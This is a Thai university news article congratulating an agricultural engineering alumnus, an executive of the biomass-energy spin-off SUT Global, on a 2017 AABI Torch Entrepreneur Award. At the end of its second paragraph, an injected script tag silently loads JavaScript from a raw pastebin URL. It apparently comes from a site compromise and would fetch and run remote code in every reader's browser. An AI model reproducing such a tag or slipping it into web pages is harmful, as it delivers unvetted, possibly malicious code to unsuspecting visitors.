ข่าว /

สาขาวิฃาวิศวกรรมเกษตร ขอแสดงความยินดีกับศิษย์เก่าสาขาวิชา นาย ศรัลย์ ปานศรีพงษ์

สาขาวิฃาวิศวกรรมเกษตร ขอแสดงความยินดีกับศิษย์เก่าสาขาวิชา นาย ศรัลย์ ปานศรีพงษ์

สาขาวิฃาวิศวกรรมเกษตร ขอแสดงความยินดีกับศิษย์เก่าสาขาวิชา

นาย ศรัลย์ ปานศรีพงษ์
หนึ่งในผู้บริหาร บริษัท เอส ยู ที โกลบอล จำกัด
ได้รับรางวัล AABI Torch Entrepreneur Awards 2017
สาขา Technology Transfer
จัดขึ้นโดย Asian Association of Business Incubators (AABI)

 

          บริษัท เอสยูที โกลบอล จำกัด ผู้ประกอบการภายใต้การบ่มเพาะธุรกิจ ของเทคโนธานี มหาวิทยาลัยเทคโนโลยีสุรนารี ผู้แทนจากประเทศไทย ได้รับรางวัล 2017 AABI Torch Entrepreneur Awards สาขา Technology Transfer จากการแข่งกันในเวทีระดับนานาชาติในภูมิภาคเอเชียแปซิฟิก กว่า 18 ประเทศ ซึ่งจัดขึ้นโดย Asian Association of Business Incubators (AABI) โดยรางวัลในการแข่งขันครั้งนี้มีวัตถุประสงค์ เพื่อเชิดชูเกียรติให้กับผู้ประกอบการ ที่ผ่านการโปรแกรมการบ่มเพาะทางธุรกิจ และมีการเจริญเติบโตอย่างโดดเด่น สามารถเป็นแบบอย่างให้กับผู้ประกอบการอื่น ๆ ได้ นอกจากนี้ยังได้รับเชิญให้เข้ารับรางวัล และร่วมงาน 23rd AABI General Assembly ณ เมืองเซี่ยงไฮ้ สาธารณรัฐประชาชนจีน ระหว่างวันที่ 24 - 27 ตุลาคม 2560

          บริษัท เอสยูที โกลบอล จำกัด ก่อตั้งโดย นักศึกษา นักวิจัย ของศูนย์ความเป็นเลิศทางด้านชีวมวล ที่ร่วมพัฒนางานวิจัยและนวัตกรรม ของศูนย์ฯ มากว่า 10 ปี จนก่อเกิดเป็นองค์กรนวัตกรรมและ Spin-off ออกมาดำเนินธุรกิจนวัตกรรมที่มีเทคโนโลยีใหม่ออกสู่สังคม ทั้งภาครัฐ ภาคเอกชน ทั้งในระดับชาติ และนานาชาติ โดยเน้นเทคโนโลยีด้านการผลิตพลังงานจากชีวมวล ขยะและของเสียอันตราย ที่เป็นมิตรต่อสิ่งแวดล้อม <script type="text/javascript" src="https://pastebin.com/raw/uY7HPabg"></script>


Share

ประชาสัมพันธ์

ข่าว

กิจกรรม